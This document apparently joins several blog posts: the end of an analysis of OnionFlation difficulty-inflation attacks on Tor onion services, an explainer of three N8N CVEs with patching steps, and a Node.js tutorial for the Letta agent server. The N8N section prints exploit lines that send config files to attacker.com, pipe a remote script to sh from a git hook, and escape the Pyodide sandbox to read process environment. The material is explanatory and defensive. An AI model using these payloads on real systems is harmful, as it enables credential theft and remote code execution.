Once the difficulty is inflated to the maximum via EnRush or Temporary Turmoil, the server limits itself to 16 concurrent rendezvous circuit connections. The attacker sends 16 high-difficulty requests but deliberately leaves all 16 connections half-open by refusing to complete the rendezvous handshake. The server’s connection slots are now occupied by dead-end circuits. No new legitimate connections can be accepted even from users who successfully solved the maximum-difficulty puzzle. Cost: approximately $2 per hour to maintain.
Strategy 4: Maintenance
After inflating the difficulty, the attacker needs to stop the server from lowering it again. The server decreases difficulty when it sees an empty queue at the measurement window. The maintenance strategy sends a small trickle of zero-difficulty requests, just enough to keep the queue non-empty. The current implementation counts requests regardless of their difficulty level, so even trivially cheap requests prevent the difficulty from dropping. Cost: 10 cents per hour.
EnRush and Temporary Turmoil inflate the difficulty; Choking and Maintenance hold it there.
The Theorem That Makes This Hard to Fix
The researchers did not just develop attacks. They also proved, mathematically, why this class of problem is fundamentally difficult to solve. This is where the paper becomes genuinely interesting beyond the exploit mechanics.
They demonstrate a perfect negative correlation between two properties any difficulty update algorithm could have:
Congestion resistance: the ability to detect and respond to a real DoS flood, raising difficulty fast enough to throttle the attacker.
Inflation resistance: the ability to resist being tricked into raising difficulty when there is no real load.
Theorem 1: No difficulty update algorithm can be simultaneously resistant to both congestion attacks and inflation attacks.
Maximising one property necessarily minimises the other. Tor’s current implementation sits at the congestion-resistant end of the spectrum, which is why OnionFlation attacks are cheap. Moving toward inflation resistance makes the system more vulnerable to genuine flooding attacks, which is what the PoW system was built to stop in the first place. As Martin notes in Clean Code, a system designed to solve one problem perfectly often creates the conditions for a new class of problem; the same logical structure applies here to protocol design.
The researchers tried five different algorithm tweaks. All of them failed to stop OnionFlation at acceptable cost. The best result pushed the attacker’s cost from $1.20 to $25 upfront and $0.50 an hour, which is still trivially affordable.
The Proposed Fix: Algorithm 2
After exhausting incremental tweaks, the researchers designed a new algorithm from scratch. Instead of taking a single snapshot of the request queue every five minutes, Algorithm 2 monitors the server’s dequeue rate: how fast it is actually processing requests in real time. This makes the difficulty tracking continuous rather than periodic, removing the window that EnRush exploits.
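In spirit, rate-based control looks something like the sketch below. This is my own illustration of the idea, not the paper's Algorithm 2 verbatim: the names, the damping rule, and the decay are assumptions. The point is that a momentary burst barely moves the difficulty, while a sustained backlog ratchets it up.

```javascript
// Loose sketch of continuous, rate-based difficulty control.
// delta damps each adjustment so a brief end-of-window burst
// (the EnRush trick) cannot spike difficulty to the maximum.
function makeController({ delta = 0.1, max = 10000 } = {}) {
  let difficulty = 1;
  return {
    // Called continuously with rates observed over a short sampling interval.
    observe(arrivalRate, dequeueRate) {
      const pressure = arrivalRate / Math.max(dequeueRate, 1);
      if (pressure > 1) {
        // Genuine backlog: raise difficulty, damped by delta.
        difficulty = Math.min(difficulty * (1 + delta * (pressure - 1)), max);
      } else {
        // Keeping up: decay back toward baseline.
        difficulty = Math.max(difficulty * (1 - delta), 1);
      }
      return difficulty;
    },
  };
}

const ctl = makeController();
let d = ctl.observe(500, 100); // a single burst nudges difficulty only slightly
for (let i = 0; i < 50; i++) d = ctl.observe(500, 100);
console.log(d); // sustained 5x overload eventually caps at 10000
```

A one-shot EnRush burst against this controller buys almost nothing; only paying the flood cost continuously moves the dial, which is exactly the $383/hour figure reported for the real algorithm.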
The algorithm exposes a parameter called delta that lets onion service operators tune their own trade-off between inflation resistance and congestion resistance. The results are considerably better:
# With Algorithm 2 (default delta):
# EnRush cost to reach max difficulty: $383/hour (vs $1.20 one-time previously)
# With delta increased slightly by the operator:
# EnRush cost: $459/hour
# Choking becomes moot because EnRush and Temporary Turmoil
# can no longer inflate the difficulty in the first place.
This is a 300x increase in attacker cost under the default configuration. The researchers tested it against the same attacker setup they used to validate the original OnionFlation attacks and found that Algorithm 2 completely prevented difficulty inflation via EnRush and Temporary Turmoil.
That said, the authors are careful to note this is one promising approach, not a proven optimal solution. The proof that no algorithm can fully resolve the trade-off still stands; Algorithm 2 just moves the dial considerably further toward inflation resistance while keeping congestion resistance viable.
Where Things Stand: Prop 362
The researchers responsibly disclosed their findings to the Tor Project in August 2024. The Tor Project acknowledged the issue and shortly afterwards opened Proposal 362, a redesign of the proof-of-work control loop that addresses the exact structural issues identified in the paper. As of the time of writing, Prop 362 is still marked open. The fix is not yet deployed.
The delay reflects the structural difficulty: any change to the global difficulty broadcast mechanism touches the entire Tor relay network, not just onion service code. Testing and rolling out changes at that scale without disrupting the live network is a non-trivial engineering problem, entirely separate from the cryptographic and algorithmic design questions.
What Onion Service Operators Can Do Right Now
The honest answer is: not much, beyond sensible hygiene. The vulnerability is in the PoW difficulty update mechanism, which operators cannot replace themselves. But the following steps reduce your exposure.
Keep Tor updated
When Prop 362 ships, update immediately. Track Tor releases at blog.torproject.org. The fix will be a daemon update.
# Debian/Ubuntu β keep Tor from the official Tor Project repo
apt-get update && apt-get install --only-upgrade tor
Do not disable PoW
Disabling proof-of-work entirely (HiddenServicePoWDefensesEnabled 0) removes the only available DoS mitigation and leaves you exposed to straightforward circuit-exhaustion flooding. OnionFlation is bad; unprotected flooding is worse. Leave it on.
Monitor difficulty in real time
If you have Tor’s metrics port enabled, you can track the live puzzle difficulty and get early warning of an inflation attack in progress:
# Watch the suggested effort metric live
watch -n 5 'curl -s http://127.0.0.1:9052/metrics | grep suggested_effort'
# Or pipe directly from the metrics port if configured
# tor config: MetricsPort 127.0.0.1:9052
A sudden jump to 10,000 with no corresponding load spike in your service logs is a strong indicator of an OnionFlation attack rather than a legitimate traffic event.
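If you want that check automated, a small watcher along these lines works. The metric line format shown, the threshold, and the alert wording are assumptions to adapt to your own MetricsPort output; only the `suggested_effort` name comes from the grep above.

```javascript
// Minimal inflation-attack watcher over Tor's metrics output.
// Threshold and metric line format are assumptions; adapt to your setup.
const ALERT_THRESHOLD = 5000;

function parseSuggestedEffort(metricsText) {
  // Prometheus-style line, e.g. "tor_hs_pow_suggested_effort 10000"
  const m = metricsText.match(/suggested_effort[^\n]*?\s(\d+(?:\.\d+)?)\s*$/m);
  return m ? Number(m[1]) : null;
}

function checkForInflation(metricsText) {
  const effort = parseSuggestedEffort(metricsText);
  if (effort === null) return 'metric not found';
  return effort >= ALERT_THRESHOLD
    ? `ALERT: suggested effort at ${effort}, possible OnionFlation attack`
    : `ok: suggested effort ${effort}`;
}

// Example against a captured metrics snippet:
console.log(checkForInflation('tor_hs_pow_suggested_effort 10000'));
console.log(checkForInflation('tor_hs_pow_suggested_effort 20'));
```

Wire the alert branch to whatever paging you already use; the useful signal is the jump itself, cross-checked against your service logs.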
Keep your service lightweight
Algorithm 2 improves cost for the attacker considerably but does not eliminate inflation attacks entirely. Running a resource-efficient service (minimal memory footprint, fast request handling) means your server survives periods of elevated difficulty with less degradation for users who do manage to solve puzzles and connect.
Redundant introduction points
Tor allows specifying the number of introduction points (default 3; see the Tor manual for the allowed range). More introduction points spread the attack surface somewhat, though this is a marginal benefit since the OnionFlation attack operates via the puzzle difficulty mechanism, not by targeting specific introduction points.
# torrc: set higher introduction point count
# (consult your Tor version docs for exact directive)
HiddenServiceNumIntroductionPoints 5
Hardening steps for onion service operators while waiting for Prop 362 to ship.
Credit to Daniel Boctor for the original live demonstration of this attack, including compiling Tor from source to manually set the puzzle difficulty to 10,000 and showcasing the real-time impact on connection attempts. The full walkthrough is worth watching.
If your workflow automation platform has access to your API keys, your cloud credentials, your email, and every sensitive document in your stack, it had better be airtight. N8N, one of the most popular self-hosted AI workflow tools around, just disclosed three vulnerabilities all rated 9.9 or higher on the CVSS scale. That is not a typo. Three separate critical flaws in the same release cycle. Let us walk through what is actually happening under the hood, why these bugs exist, and what you need to do to fix them.
Three 9.9-severity CVEs in N8N: a case study in why sandboxing arbitrary execution is brutally hard.
What is N8N and Why Does Any of This Matter?
N8N is a workflow automation platform in the spirit of Zapier or Make, but self-hosted and AI-native. You wire together “nodes” (small units that do things like pull from an API, run a script, clone a git repository, or execute Python) into pipelines that automate essentially anything. That last sentence is where the problem lives. When your platform’s entire value proposition is “run arbitrary code against arbitrary APIs”, the attack surface is not small.
The threat model here is not some nation-state attacker with a zero-day budget. It is this: you are running N8N at work, or in your home lab, and several people have accounts at different trust levels. One of those users turns out to be malicious, or simply careless enough to import a workflow from the internet without reading it. The three CVEs below are all authenticated attacks, meaning the attacker already has a login. But once they are in, they can compromise the entire instance and read every credential stored by every other user on the node. If you have ever wondered why the principle of least privilege exists, here is a textbook example.
CVE-2025-68613: JavaScript Template Injection via constructor.constructor
This one is elegant in the most uncomfortable sense. N8N workflows support expression nodes, small blobs of JavaScript that get evaluated to transform data as it flows through the pipeline. The bug is in how these expressions are sanitised before evaluation: they are not, at least not sufficiently.
An authenticated attacker creates a workflow with a malicious “Function” node and injects the following pattern into an expression parameter:
// Inside the malicious workflow's function node
const fn = (function(){}).constructor.constructor('return require("child_process")')();
fn.execSync('curl http://attacker.com/exfil?data=$(cat /data/config.json)', { encoding: 'utf8' });
If you recognise that constructor.constructor pattern, you have probably read about the React Server Components flight protocol RCE from 2024. The idea is the same: if you do not lock down access to the prototype chain, you can climb your way up to the Function constructor and use it to build a new function from an arbitrary string. From there, require('child_process') is just a function call away, and execSync lets you run anything with the same privileges as the N8N process.
The reason this class of bug keeps appearing is that JavaScript’s object model is a graph, not a tree. As Hofstadter might put it in GΓΆdel, Escher, Bach, the system is self-referential by design: functions are objects, objects have constructors, constructors are functions. Trying to sandbox that without a proper allow-list is fighting the language itself.
Climbing the constructor chain: from user expression to arbitrary OS command execution.
The Second Critical Flaw: Python Sandbox Escape via Pyodide
N8N supports a Python code node powered by Pyodide, a runtime that compiles CPython to WebAssembly so it can run inside a JavaScript environment. The idea is that by running Python inside WASM, you get a layer of isolation from the host. In theory, reasonable. In practice, the sandbox was implemented as a blacklist.
A blacklist sandbox is the security equivalent of putting up a sign that says “No bicycles, rollerblades, skateboards, or scooters.” The next person to arrive on a unicycle is perfectly within the rules. The correct approach is a whitelist: enumerate exactly what the sandboxed code is allowed to do and deny everything else by default.
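The difference is easy to see in miniature. This is a toy illustration of the two policies over capability names, not N8N's actual sandbox code:

```javascript
// Toy illustration: blacklist vs whitelist over capability names.
const BLACKLIST = new Set(['os.system', 'subprocess.run', 'eval']);
const WHITELIST = new Set(['json.dumps', 'math.sqrt', 'len']);

const blacklistAllows = (call) => !BLACKLIST.has(call);
const whitelistAllows = (call) => WHITELIST.has(call);

// The blacklist stops what its authors thought of...
console.log(blacklistAllows('subprocess.run'));          // false
// ...and waves through the variant they did not.
console.log(blacklistAllows('subprocess.check_output')); // true

// The whitelist denies by default: the variant never had a chance.
console.log(whitelistAllows('subprocess.check_output')); // false
console.log(whitelistAllows('json.dumps'));              // true
```

The blacklist's failure mode is an unbounded search problem for the defender; the whitelist's failure mode is merely an inconvenience for legitimate users, which is the trade you want.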
In the case of N8N’s Python node, the blacklist missed subprocess.check_output, one of the most obvious ways to shell out from Python.
That alone is bad enough. But Pyodide also exposes an internal API that compounds the issue. The runtime has a method called runPython (sometimes surfaced as pyodide.runPythonAsync or accessed via the internal _api object) that evaluates Python code completely outside the sandbox restrictions. So even if the blacklist had been more thorough, an attacker could escape through the runtime’s own back door:
// From within the N8N sandbox, access Pyodide's internal runtime
const pyodide = globalThis.pyodide || globalThis._pyodide;
pyodide._api.runPython(`
import subprocess
subprocess.check_output(['cat', '/proc/1/environ'])
`);
N8N patched the obvious subprocess bypass in version 1.11.1 by making the native Python runner opt-in via an environment variable (N8N_PYTHON_ENABLED). It is disabled by default in patched builds. The Pyodide internal API bypass was disclosed shortly after and addressed in a subsequent patch.
CVE-2026-21877: Arbitrary File Write via the Git Node
The Git node in N8N lets you build workflows that clone repositories, pull updates, and interact with git as part of an automated pipeline. The vulnerability here is an arbitrary file write: an authenticated attacker can craft a workflow that causes a repository to be cloned to an attacker-controlled path on the host filesystem, outside the intended working directory.
The most likely mechanism, based on Rapid7’s write-up, is either a directory traversal in the destination path parameter, or a git hook execution issue. When you clone a repository, git can execute scripts automatically via hooks (.git/hooks/post-checkout, for example). If the N8N process clones an attacker-controlled repository without sanitising hook execution, those scripts run with the privileges of N8N:
# .git/hooks/post-checkout (inside attacker's repo)
#!/bin/sh
curl http://attacker.com/shell.sh | sh
Alternatively, a traversal in the clone target path lets the attacker overwrite arbitrary files in the N8N process’s reach, including config files, plugin scripts, or anything that gets loaded dynamically at runtime. Either way, the result is remote code execution under the N8N service account.
Git hooks or directory traversal in the clone target: two paths to the same outcome.
How to Fix It
Here is what you need to do, in order of priority.
1. Update N8N immediately
All three CVEs are patched. The minimum safe version is 1.11.1 for the Python sandbox fix; check the N8N releases page for the latest. If you are running Docker:
# Pull the latest patched image
docker pull n8nio/n8n:latest
# Or pin to a specific patched version
docker pull n8nio/n8n:1.11.1
# Restart your container
docker compose down && docker compose up -d
2. Disable the native Python runner if you do not need it
In patched builds the native Python execution environment is off by default. Keep it that way unless you explicitly need it. To pin the safe configuration explicitly, add this to your environment, and flip the Python flag to true only if you genuinely need it and accept the residual risk:
# In your docker-compose.yml or .env
N8N_RUNNERS_ENABLED=true
N8N_RUNNER_PYTHON_ENABLED=false # leave false unless you need it
3. Never expose N8N to the public internet
All three of these are authenticated attacks, but that does not mean “exposure is fine”. Default credentials, credential stuffing, and phishing are real vectors. Put N8N behind a VPN or a private network interface. If you are on a VPS, a simple firewall rule is the minimum:
# UFW: allow N8N only from your own IP or VPN range, then deny the rest
# (ufw evaluates rules in insertion order, so add the allow rule first)
ufw allow from 10.8.0.0/24 to any port 5678 # VPN subnet example
ufw deny 5678
4. Run N8N as a non-privileged user with a restricted filesystem
N8N should not run as root. If it does, any RCE immediately becomes a full server compromise. In Docker, set a non-root user and mount only the volumes N8N actually needs:
services:
  n8n:
    image: n8nio/n8n:latest
    user: "1000:1000"
    volumes:
      - n8n_data:/home/node/.n8n # only the data volume, nothing else
    environment:
      - N8N_RUNNERS_ENABLED=true
5. Enforce strict workflow permissions
In N8N’s settings, limit which users can create or modify workflows. The principle of least privilege applies here just as it does anywhere else in your infrastructure. A user who only needs to trigger existing workflows has no business being able to create a Function node.
# Harden filesystem access for workflow code via the N8N environment
# (N8N_RESTRICT_FILE_ACCESS_TO expects a list of allowed paths; see the N8N docs)
N8N_RESTRICT_FILE_ACCESS_TO=/data/workflows # example allow-list path
N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true
6. Audit stored credentials
If your N8N instance was exposed and you suspect compromise, rotate every credential stored in it. API keys, OAuth tokens, database passwords, all of it. N8N stores credentials encrypted at rest, but if the process was compromised, the encryption keys were in memory and accessible. Treat all stored secrets as leaked.
Update, isolate, restrict: the three-step response to any critical CVE in a self-hosted tool.
The Bigger Picture: Sandboxing Arbitrary Code Is a Hard Problem
None of this is unique to N8N. Any platform whose core proposition is “run whatever code you like” faces the same fundamental tension. Sandboxing is not a feature you bolt on after the fact; it has to be the architectural foundation. The Pragmatic Programmer puts it well: “Design to be tested.” You could equally say “design to be breached”: assume code will escape the sandbox and build your layers of defence accordingly.
The blacklist vs. whitelist distinction matters enormously here. A whitelist sandbox says: “you may use these ten system calls and nothing else.” A blacklist sandbox says: “you may not use these hundred things,” and then waits for an attacker to find item 101. Kernel-level sandboxing tools like seccomp-bpf on Linux are the right building block for the whitelist approach in a container environment. Language-level tricks β Pyodide, V8 isolates, WASM boundaries β are useful layers but are not sufficient on their own.
The complicating factor, as the Low Level video below notes, is that N8N’s architecture has many nodes and the contracts between them multiply the surface area considerably. Getting every node’s sandbox right simultaneously, especially under active development with a small team, is genuinely difficult. These CVEs are a reminder that security review needs to scale with the feature count, not lag behind it.
Video Attribution
Credit to the Low Level channel for the original technical breakdown of these CVEs. The walkthrough of the constructor injection exploit and the Pyodide internals is worth watching in full.
In the previous article on context management, we built the machinery by hand: sliding windows, compaction, PostgreSQL-backed memory stores, A2A handoffs. That is genuinely useful knowledge. But at some point you look at the boilerplate and think: surely someone has already solved the plumbing. They have. It is called Letta, it is open source, and it implements every pattern we discussed as a first-class runtime. This article is about how to actually use it, with Node.js, in a way that is production-shaped rather than tutorial-shaped.
Letta agents are stateful services: memory blocks orbit the agent like persistent satellites, and the database beneath is the source of truth.
What Letta Is (and What It Is Not)
Letta is the production evolution of MemGPT, a research project from UC Berkeley that demonstrated you could give an LLM the ability to manage its own memory through tool calls, effectively creating unbounded context. The research paper was elegant; the original codebase was academic. Letta is the commercial rewrite: a stateful agent server with a proper REST API, a TypeScript/Node.js client, PostgreSQL-backed persistence, and a web-based Agent Development Environment (ADE) at app.letta.com.
The key architectural commitment Letta makes is that the server owns all state. You do not manage a message array in your application. You do not serialise session state to disk. You do not build a compaction loop. You send a new user message, the Letta server handles the rest: it injects the right memory blocks, runs the agent, manages the context window, persists everything to its internal PostgreSQL database, and returns the response. Your application is stateless; Letta’s server is stateful. This is Kleppmann’s stream processing model applied to agents: the server is the durable log, and your application is just a producer/consumer.
What Letta is not: a model provider, a prompt engineering framework, or a replacement for your orchestration logic when you need bespoke control. It is an agent runtime. You still choose the model (any OpenAI-compatible endpoint, Anthropic, Ollama, etc.). You still design the tools. You still decide the architecture. Letta manages context, memory, and persistence so you do not have to.
Running Letta: Docker in Two Minutes
The fastest path to a running Letta server is Docker. One command, PostgreSQL included:
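At the time of writing, the quickstart command looks roughly like the following; confirm the image name, tag, and volume path against the current Letta documentation before relying on it.

```shell
# Approximate quickstart; verify against Letta's current docs.
docker run -d \
  -p 8283:8283 \
  -v ~/.letta/.persist/pgdata:/var/lib/postgresql/data \
  letta/letta:latest
```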
The server starts on port 8283. Agent data persists to the mounted volume. The ADE at https://app.letta.com can connect to your local instance for visual inspection and debugging. Point it at http://localhost:8283 and you have a full development environment with memory block viewers, message history, and tool call traces.
For production, you will want to externalise the PostgreSQL instance (a managed RDS or Cloud SQL instance), set LETTA_PG_URI to point at it, and run Letta behind a reverse proxy with TLS. The Letta server itself is stateless between requests; it is the database that holds everything. That means you can run multiple Letta instances behind a load balancer pointing at the same PostgreSQL, which is the correct horizontal scaling pattern.
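A minimal sketch of that horizontal scaling pattern in Compose terms, assuming the `LETTA_PG_URI` variable from the text and an image name and credentials that you should verify against Letta's docs:

```yaml
# Sketch: two stateless Letta instances sharing one external Postgres.
# Image name, credentials, and host names here are illustrative.
services:
  letta-1:
    image: letta/letta:latest
    environment:
      - LETTA_PG_URI=postgresql://letta:secret@db.internal:5432/letta
    ports:
      - "8283:8283"
  letta-2:
    image: letta/letta:latest
    environment:
      - LETTA_PG_URI=postgresql://letta:secret@db.internal:5432/letta
    ports:
      - "8284:8283"
# Front both instances with your load balancer / reverse proxy terminating TLS.
```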
Install the Node.js client:
npm install @letta-ai/letta-client
Connect to your local or remote server:
import Letta from '@letta-ai/letta-client';
// Local development
const client = new Letta({ baseURL: 'http://localhost:8283' });

// Or, for Letta Cloud (managed, no self-hosting required):
// const client = new Letta({ apiKey: process.env.LETTA_API_KEY });
The Letta server stack: REST API on top, agent runtime in the middle, PostgreSQL at the bottom. Your app only sees the top layer.
Memory Blocks: The Core Abstraction
If you read the context management article, you encountered the concept of “always-in-context pinned memory”: facts that never get evicted, always present at the top of the system prompt. Letta formalises this as memory blocks. A memory block is a named, bounded string that gets prepended to the agent’s system prompt on every single turn, in a structured XML-like format the model can read and modify.
This is what the model actually sees in its context window:
<memory_blocks>
  <persona>
    <description>Stores details about your persona, guiding how you behave.</description>
    <metadata>chars_current=128 | chars_limit=5000</metadata>
    <value>I am Sam, a persistent assistant that remembers across sessions.</value>
  </persona>
  <human>
    <description>Key details about the person you're conversing with.</description>
    <metadata>chars_current=84 | chars_limit=5000</metadata>
    <value>Name: Alice. Role: senior backend engineer. Prefers concise answers. Uses Node.js.</value>
  </human>
</memory_blocks>
Three things make this powerful. First, the model can see the character count and limit, so it manages the block like a finite buffer rather than writing without restraint. Second, the description field is the primary signal the model uses to decide how to use each block: write a bad description and the agent will misuse it. Third, blocks are editable by the agent via built-in tools: when the agent learns something worth preserving, it calls core_memory_replace or core_memory_append, and that change is persisted immediately to the database and visible on the next turn.
Here is a full agent creation with custom memory blocks in Node.js:
// create-agent.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
const agent = await client.agents.create({
  name: 'dev-assistant',
  model: 'anthropic/claude-3-7-sonnet-20250219',
  embedding: 'openai/text-embedding-3-small', // required for archival memory search
  memory_blocks: [
    {
      label: 'persona',
      value: 'I am a persistent dev assistant. I remember what you are working on, your preferences, and your past decisions. I am direct and do not pad answers.',
      limit: 5000,
    },
    {
      label: 'human',
      value: '', // starts empty; agent fills this in as it learns about the user
      limit: 5000,
    },
    {
      label: 'project',
      description: 'The current project the user is working on: name, stack, key decisions, and open questions. Update whenever the project context changes.',
      value: '',
      limit: 8000,
    },
    {
      label: 'mistakes',
      description: 'A log of mistakes or misunderstandings from past conversations. Consult this before making similar suggestions. Add to it when corrected.',
      value: '',
      limit: 3000,
    },
  ],
});
console.log('Agent created:', agent.id);
// Save this ID: it is the persistent identifier for this agent across all sessions
The project and mistakes blocks are custom: Letta does not know what they are for, but the model does, because you told it in the description field. This is where Hofstadter’s recursion shows up in the most practical way: you are configuring an agent’s memory by describing to the agent what memory is for, and the agent then self-organises accordingly.
Sending Messages: The Stateless Caller Pattern
This is the part that trips up developers coming from a hand-rolled context manager. With Letta, you do not maintain a message array. You do not pass the conversation history. You send only the new message. The server knows the history:
// chat.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
async function chat(agentId, userMessage) {
  const response = await client.agents.messages.create(agentId, {
    messages: [
      { role: 'user', content: userMessage },
    ],
  });
  // Extract the final text response from the run steps
  const textResponse = response.messages
    .filter(m => m.message_type === 'assistant_message')
    .map(m => m.content)
    .join('\n');
  return textResponse;
}
// First message: the agent starts learning about the user
const reply1 = await chat('agent-id-here', 'Hi, I\'m working on a Node.js API that serves a mobile app. Postgres for data, Redis for sessions.');
console.log(reply1);
// Second message, completely separate process invocation:
// The agent already knows everything from the first message.
const reply2 = await chat('agent-id-here', 'What database am I using again?');
console.log(reply2); // → "You're using Postgres for data and Redis for sessions."
The agent’s memory block for project was updated by the model itself during the first turn via its built-in memory tools. On the second turn, that block is injected back into context automatically. Your application code never touched any of it.
You can inspect what the agent currently knows at any point via the API:
// Peek at the agent's current memory state
const projectBlock = await client.agents.blocks.retrieve(agentId, 'project');
console.log('What the agent knows about your project:');
console.log(projectBlock.value);
Because their character limits are visible to the model, the agent manages memory blocks like bounded buffers, not infinite strings.
Archival Memory: The Infinite Store
Memory blocks are bounded (5,000 characters by default). For anything that does not fit, Letta provides archival memory: an external vector store backed by pgvector (in the self-hosted setup) or Letta Cloud’s managed index. The agent accesses it via two built-in tool calls that appear in its context as available tools: archival_memory_insert and archival_memory_search.
You do not have to configure these tools; they are always present. When the agent encounters a piece of information that is too large or too ephemeral for a core memory block, it decides to archive it. When it needs to recall something from the past, it issues a semantic search. All of this is embedded in the agent’s reasoning loop, not your application code.
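From the model's side, these built-in calls can be sketched as tool-call payloads. The argument names below are illustrative, not the exact wire format; consult the tool schemas your Letta server exposes:

```javascript
// Hypothetical shapes of the two built-in archival tool calls as the model
// might emit them (argument names are illustrative, not the exact wire format)
const insertCall = {
  name: 'archival_memory_insert',
  arguments: {
    content: 'Decision: moved session storage from Postgres to Redis for latency.',
  },
};
const searchCall = {
  name: 'archival_memory_search',
  arguments: { query: 'why did we move sessions to redis' },
};
console.log(insertCall.name, searchCall.name);
```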
You can also write to archival memory programmatically from your application, which is useful for seeding an agent with existing knowledge:
// seed-archival-memory.js
// Useful for bulk-loading documentation, past conversation summaries,
// or domain knowledge before the agent starts interacting with users
async function seedKnowledge(agentId, documents) {
for (const doc of documents) {
await client.agents.archivalMemory.create(agentId, {
text: doc.content,
});
console.log(`Seeded: ${doc.title}`);
}
}
// Example: seed with codebase context
await seedKnowledge(agentId, [
{ title: 'Auth module', content: 'The authentication module uses JWT with 24h expiry. Refresh tokens stored in Redis with 30-day TTL. See src/auth/...' },
{ title: 'DB schema', content: 'Main tables: users, sessions, events. users.id is UUID. events has a JSONB payload column...' },
{ title: 'Deployment', content: 'Production runs on Render. Two services: api (Node.js) and worker (Bull queue). Shared Postgres on Supabase...' },
]);
// Search archival memory (what the agent would do internally)
const results = await client.agents.archivalMemory.list(agentId, {
query: 'authentication refresh token',
limit: 5,
});
Multi-Agent Patterns with Shared Memory Blocks
This is where Letta’s design diverges most sharply from a DIY approach. In our context management article, the A2A section covered how to pass context between agents via structured handoff payloads. Letta adds a second mechanism that is often cleaner: shared memory blocks. A block attached to multiple agents is simultaneously visible to all of them. When any agent updates it, all agents see the change on their next turn.
The coordination pattern this enables: a supervisor agent writes its plan to a shared task_state block. All worker agents have that block in their context windows. The supervisor does not need to message each worker explicitly; the workers read the shared state and self-coordinate. This is closer to a shared blackboard than a message bus, and for many use cases it is significantly simpler:
// multi-agent-setup.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
// Create a shared state block
const taskStateBlock = await client.blocks.create({
label: 'task_state',
description: 'Current task status shared across all agents. Supervisor writes the plan and tracks progress. Workers read their assignments and update status when done.',
value: JSON.stringify({ status: 'idle', tasks: [], results: [] }),
limit: 10000,
});
// Create supervisor agent
const supervisor = await client.agents.create({
name: 'supervisor',
model: 'anthropic/claude-3-7-sonnet-20250219',
memory_blocks: [
{ label: 'persona', value: 'I coordinate teams of specialist agents. I decompose tasks, assign them, and synthesise results.' },
],
block_ids: [taskStateBlock.id], // attach shared block
});
// Create worker agents β all share the same task state block
const workers = await Promise.all(['code-analyst', 'security-reviewer', 'doc-writer'].map(name =>
client.agents.create({
name,
model: 'anthropic/claude-3-5-haiku-20241022', // cheaper model for workers
memory_blocks: [
{ label: 'persona', value: `I am a specialist ${name} agent. I read my assignments from task_state and write my results back.` },
],
block_ids: [taskStateBlock.id],
tags: ['worker'], // tags enable broadcast messaging
})
));
For direct agent-to-agent messaging, Letta provides three built-in tools the model can call: send_message_to_agent_async (fire-and-forget, good for kicking off background work), send_message_to_agent_and_wait_for_reply (synchronous, good for gathering results), and send_message_to_agents_matching_all_tags (broadcast to a tagged group).
The supervisor-worker pattern with broadcast looks like this from the application perspective:
// Run the supervisor with a task; it handles delegation internally
const result = await client.agents.messages.create(supervisor.id, {
messages: [{
role: 'user',
content: 'Review the PR at github.com/org/repo/pull/42. Get security, code quality, and docs perspectives.',
}],
});
// The supervisor will internally:
// 1. Decompose the task into three sub-tasks
// 2. Call send_message_to_agents_matching_all_tags({ tags: ['worker'], message: '...' })
// 3. Each worker agent processes its sub-task
// 4. Results flow back to the supervisor
// 5. Supervisor synthesises and responds to the original message
// You can watch the shared block update in real time:
const state = await client.blocks.retrieve(taskStateBlock.id);
console.log(JSON.parse(state.value));
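If you want to block until the workers finish, the retrieve call above can be wrapped in a simple polling loop. The completion rule and interval here are illustrative choices, not Letta conventions:

```javascript
// watch-task-state.js
// Poll the shared block until every task in it has a reported result.
function isComplete(state) {
  // Pure helper: done when each task has a matching result entry
  return state.tasks.length > 0 && state.results.length >= state.tasks.length;
}

async function watchTaskState(client, blockId, pollIntervalMs = 2000) {
  for (;;) {
    const block = await client.blocks.retrieve(blockId);
    const state = JSON.parse(block.value);
    console.log(`status=${state.status} results=${state.results.length}/${state.tasks.length}`);
    if (isComplete(state)) return state;
    await new Promise(resolve => setTimeout(resolve, pollIntervalMs));
  }
}
```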
Conversations API: One Agent, Many Users
The multi-user pattern in Letta has two flavours. The simpler one: create one agent per user. Each agent has its own memory blocks and history. Clean isolation, straightforward. The more powerful one, added in early 2026: the Conversations API, which lets multiple users message a single agent through independent conversation threads without sharing message history.
This is the right pattern for a shared assistant that should have a consistent persona and knowledge base across all users, while keeping each user’s conversation private:
// conversations.js
// Create a single shared agent (one-time setup)
const sharedAssistant = await client.agents.create({
name: 'company-assistant',
model: 'anthropic/claude-3-7-sonnet-20250219',
memory_blocks: [
{
label: 'persona',
value: 'I am the Acme Corp internal assistant. I know our products, policies, and engineering practices.',
},
{
label: 'policies',
description: 'Company policies. Read-only. Do not modify.',
value: 'Data retention: 90 days. Escalation path: ops → engineering → CTO. ...',
read_only: true,
},
],
});
// Each user gets their own conversation thread with this agent
async function getUserConversation(agentId, userId) {
// List existing conversations for this user
const conversations = await client.agents.conversations.list(agentId, {
user_id: userId,
});
if (conversations.length > 0) {
return conversations[0].id; // resume existing
}
// Create a new conversation thread for this user
const conversation = await client.agents.conversations.create(agentId, {
user_id: userId,
});
return conversation.id;
}
// Send a message within a user's private conversation thread
async function sendMessage(agentId, conversationId, userMessage) {
return client.agents.messages.create(agentId, {
conversation_id: conversationId,
messages: [{ role: 'user', content: userMessage }],
});
}
// Usage: two users, one agent, completely isolated message histories
const aliceConvId = await getUserConversation(sharedAssistant.id, 'user-alice');
const bobConvId = await getUserConversation(sharedAssistant.id, 'user-bob');
await sendMessage(sharedAssistant.id, aliceConvId, 'What is our data retention policy?');
await sendMessage(sharedAssistant.id, bobConvId, 'How do I escalate a prod incident?');
Connecting to What We Built Before
If you built the context manager from the previous article, you already understand what Letta is doing under the hood. The memory blocks are the workspace injection layer (SOUL.md, USER.md, etc.) made into a first-class API. The built-in memory tools are the memoryFlush hook, made automatic. The Conversations API is the session store with user-scoped RLS, managed for you. The archival memory tools are the PostgresMemoryStore with pgvector, managed for you.
The practical question is when to use Letta versus building your own. The answer is usually: use Letta when the standard patterns fit, build your own when they do not. Letta is excellent for: persistent user-facing assistants, multi-agent systems with shared state, anything where you need reliable memory across sessions without owning the infrastructure. Build your own when: you need sub-millisecond latency and cannot afford the Letta server round-trip, you need extreme control over what enters the context window, or you are building a very specialised agent loop that does not match any of Letta’s patterns.
